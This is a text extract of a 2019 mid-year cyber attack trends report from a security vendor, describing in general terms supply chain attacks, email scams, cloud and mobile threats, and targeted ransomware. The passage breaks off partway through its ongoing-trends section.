资源描述
CYBER ATTACK TRENDS: 2019 MID-YEAR REPORTTABLE OF CONTENTS | 2TABLE OF CONTENTSIntroduction . 3Software Supply Chain Attacks on the Rise . 4Email Scams Gear Up . 5Attacks Against Cloud Environments . 6The Evolving Mobile Landscape . 7Ongoing Trends . 8Cyber Attack Categories by Region . 9Global Threat Index Map . 9Top Malicious File Types (H1 2019) . 10Global Malware Statistics . 11 Top Malware Families . 11 Top Cryptomining Malware . 13 Top Banking Malware . 14 Top Botnet Malware . 15 Top Mobile Malware . 16Major Cyber Breaches (H1 2019) . 17High Profile Global Vulnerabilities . 19Appendix Malware Family Descriptions . 20INTRODUCTION | 3INTRODUCTIONThe first half of 2019 demonstrated that no environment is immune to cyber attacks. We have witnessed threat actors developing new tool sets and techniques, targeting corporate assets stored on cloud infrastructure, individuals mobile devices, trusted third-party suppliers application and even popular mail platforms.One of the dominating ongoing trends in 2019 is targeted ransomware attacks. This year collaborations between threat actors allowed even more destructive attacks that paralyzed numerous organizations worldwide. What ends with a ransomware attack usually starts with a more silent sequence of bot infections. Still highly visible, cryptominers are on the decline this year only 21% of organizations worldwide were affected by cryptominers attacks in comparison to 42% during its peak in 2018. This was the outcome after shutting down the CoinHive drive-by mining service.Software supply chain attacks attracted public and government attention. In such attacks threat actors inject malicious code into components of legitimate applications, victimizing a large number of unsuspecting users. The accumulation of several cases since the beginning of the year led the American government to devote special attention to this evolving threat and will soon publish official recommendations on ways to minimize the impact of such attacks.To provide organizations with the best level of protection, security experts should be attuned to the ever-changing landscape and the latest threats and attack methods. With data drawn from Check Points ThreatCloud World Cyber Threat Map between January and June 2019, combined with primary research performed by the companys cyber security experts , the following report holds a comprehensive overview of the trends observed in the various categories of cryptominers, ransomware, botnet, banking Trojans, data breaches, and mobile threats. SOFTWARE SUPPLY CHAIN ATTACKS ON THE RISE | 4SOFTWARE SUPPLY CHAIN ATTACKS ON THE RISEGrowing cyber security awareness and the increasing use of security solutions have made cyber attack attempts more challenging and have pushed motivated threat actors to extend their attacks to new vectors. Focusing on the supply chain of a selected target is such an attempt. In software supply-chain attacks the threat actor typically installs malicious code into legitimate software by modifying and infecting one of the building blocks the software relies upon. As with physical chains, software supply chains are only as strong as their weakest link. Software supply chain attacks can be divided into two main categories. The first includes targeted attacks aiming to compromise well-defined targets, scanning their suppliers list in search of the weakest link through which they could enter. The ShadowHammer attack on ASUS is a recent example. Attackers implanted malicious code into the ASUS Live Update utility, allowing them to later install backdoors on millions of remote computers. Interestingly, the malicious implant included a hardcoded list of several hundred network adapters MAC addresses which means second stage backdoors could be surgically delivered to predefined targets.In the second category, software supply chains are used to compromise as many victims as possible by locating a weak link with a large distribution radius. One such example is the attack on PrismWeb, an e-commerce platform, in which attackers injected a skimming script into the shared JavaScript libraries used by online stores, affecting more than 200 online university campus stores in North America. Many of such MageCart style attacks utilize similar supply chain attack vectors.The sharp increase in supply chain attacks has brought the US Department of Homeland Security (DHS) to establish the Information and Communications Technology Supply Chain Risk Management Task Force which started its work earlier this year. In addition, on May 15, the White House issued an executive order, declaring foreign supply chain threats as a national emergency and empowering the Secretary of Commerce to prohibit transactions later leading to a ban of the technology giant Huawei.The mobile arena is also prone to supply chain attacks. Operation Sheep, as reviewed by Check Point Research, exposed the SWAnalytics infected SDK. Non-suspecting mobile apps developers used this SDK and thus unknowingly assisted in distributing malicious contact-harvesting malware to more than 100 million end-users.From the hackers point of view this method has at least two distinct advantages they rely on the good reputation of third-party vendors and multiply their circulation manifold by using the original vendors distribution mechanism. The supply chain attack vector has been a growing trend for a while but the reaction of US and international authorities testify to both its magnitude and severity. This type of attack vector is more than just a dangerous technique; it strikes at the basic trust on which supplier-customer relations are based. EMAIL SCAMS GEAR UP | 5EMAIL SCAMS GEAR UPIt is safe to say there is no organization or individual that is not exposed to multiple malicious email campaigns at any given time. But with the growing attention of security vendors and the public awareness for email attacks, threat actors have introduced improved phishing tactics aimed at establishing credibility among victims, as well as advanced evasion techniques to bypass mail security solutions.With this shift, Check Point researchers witnessed a surge in the volume of Sextortion scams and business email compromise (BEC), which fraudulently trick victims into making a payment through blackmail or by convincingly impersonating others, respectively. Both scams adopt these elements and do not necessarily contain any malicious attachments or links, which makes them even harder to detect.Email scammers have started to employ various evasion techniques designed to bypass security solutions and anti-spam filters. The various evasions we detected included encoded emails, images of the message embedded in the email body, as well as complex underlying code that mixes plain text letters with HTML character entities. Social engineering techniques, as well as varying and personalizing the content of the emails, are additional methods allowing the scammers to fly safely under the radar of anti-spam filters and reach their targets inbox.Determined to convince victims of their credibility, this year saw the Sextortion scammers doing everything possible to make their victims worried enough to pay up and avoid the publication of the alleged sexual materials. This mainly includes providing the victims personal credentials as evidence, which were usually leaked in previous data breaches or purchased in underground forums. Other tactics, mainly common in BEC attacks, are domain and display-name spoofing as well as sending the emails from valid high-reputation entities such as compromised Microsoft Office 365 or Gmail accounts. In April, one sextortion campaign went as far as pretending to be from the CIA and warned victims they were suspected of distributing and storing child pornography, while demanding $10,000 in Bitcoin. In a world where email scams have become a business in which professional cyber criminals are hired to run email campaigns, it is also safe to say that this industry is definitely here to stay. Spammers will continue to improve their capabilities and techniques to ensure their scams profitability, just as security vendors will continue to improve their products to protect against such threats.ATTACKS AGAINST CLOUD ENVIRONMENTSThe growing popularity of public cloud environments has led to an increase of cyber attacks targeting resources and sensitive data residing within these platforms. Following the 2018 trend, practices such as misconfiguration and poor management of cloud resources remained the most prominent threat to the cloud ecosystem in 2019 and, as a result, subjected cloud assets to a wide array of attacks. This year, misconfiguring cloud environments was one of the main causes for a vast number of data theft incidents experienced by organizations worldwide.In April, more than half a billion records of Facebooks users were exposed by a third party on unprotected Amazon cloud servers. Misconfigured Box accounts leaked terabytes of extremely sensitive data from many companies, and in another case sensitive financial information of 80 million Americans hosted on a Microsoft cloud server was exposed online.Besides information theft, threat actors intentionally abuse the different cloud technologies for their computing power. So far this year, cloud cryptomining campaigns stepped up, upgraded their technique set and were capable of evading basic cloud security products, abusing hundreds of vulnerable exposed Docker hosts and even shutting down competitors cryptomining campaigns operating in the cloud.In addition, in 2019 Check Point researchers witnessed an increase in the number of exploitations against public cloud infrastructures. A vulnerability in SoftNAS Cloud platform discovered in March may have allowed attackers to bypass authentication and gain access to a companys web-based admin interface and then run arbitrary commands. Furthermore, a new type of attack vector, dubbed Cloudborne, demonstrated that hardware re-provisioned to new customers could retain backdoors that can be used to attack future users of the compromised system.With the number of enterprises that migrate their storage and computing infrastructure to the cloud environment increasing, best security practices must be followed and proper solutions implemented in order to prevent the next massive data breach.ATTACKS AGAINST CLOUD ENVIRONMENTS | 6THE EVOLVING MOBILE LANDSCAPESince all of our personal and business lives are managed and stored within mobile devices, threat actors are today extremely motivated to launch a wide range of attacks: profitable advertising campaigns, sensitive credential theft through fake apps, and surveillance operations are just some of the exploits conducted. So far this year we have seen more and more malicious actors adapting techniques and methods from the general threat landscape to the mobile world.As one of the most popular malware types, banking malware has successfully infiltrated the mobile cyber arena with a sharp rise of more than 50% compared to 2018. In correlation to the growing use of banks mobile applications, malware capable of stealing payment data, credentials and funds from victims bank accounts have been pushed from the general threat landscape and became a very common mobile threat too. The methodology used to distribute banking malware has also been borrowed from the general threat landscape malware builders available for purchase in underground forums. In this way the builders of mobile bankers, such as Asacub and Anubis, can allow the creation of new versions of these malware, ready for massive distribution, by anyone willing to pay. Another interesting element observed so far this year and inspired by the general threat landscape, is the dawn of the evasions era for the mobile arena. From a delayed execution to avoid sandboxes, through using transparent icons with empty application labels, to encrypting the malicious payload it is quite evident that cyber criminals have boosted their skill sets and creativity for mobile attacks, determined to evade detection while keeping their malware persistent and effective. This year, two fake applications were discovered on Google Play capable of monitoring devices motion sensors to evade security emulators. Furthermore, in March, a new Android Trojan dubbed Gustuff was introduced to be capable of targeting customers of leading international banks and features various evasion techniques, including turning off Google Protect, the built-in anti-malware protection on Android.So after probing the mobile field, threat actors are stepping up their efforts and as a result we can expect to see mobile attacks rise in the months and years ahead. THE EVOLVING MOBILE LANDSCAPE | 7ONGOING TRENDSIn addition to the above major trends, there are three other cyber trends of 2018 that are still very relevant in 2019. The targeted ransomware approach which gained popularity during 2018 has proven effective in 2019; not a week goes by without some kind of tailored destructive ransomware attack hitting the headlines. One such prominent attack vector utilizes Emotets vast distribution and victim base to select lucrative targets. Emotet is used to spread TrickBot within the compromised corporate network which, in turn, deploys Ryuk or other ransomware as the final payload. From countless local government entities through a cloud hosting provider, industrial corporations and airports, this year every organization is a potential target to the catastrophe of targeted ransomware, led by Ryuk and LockerGoga. The infamous cryptominers remained a prevalent malware type in the first half of
展开阅读全文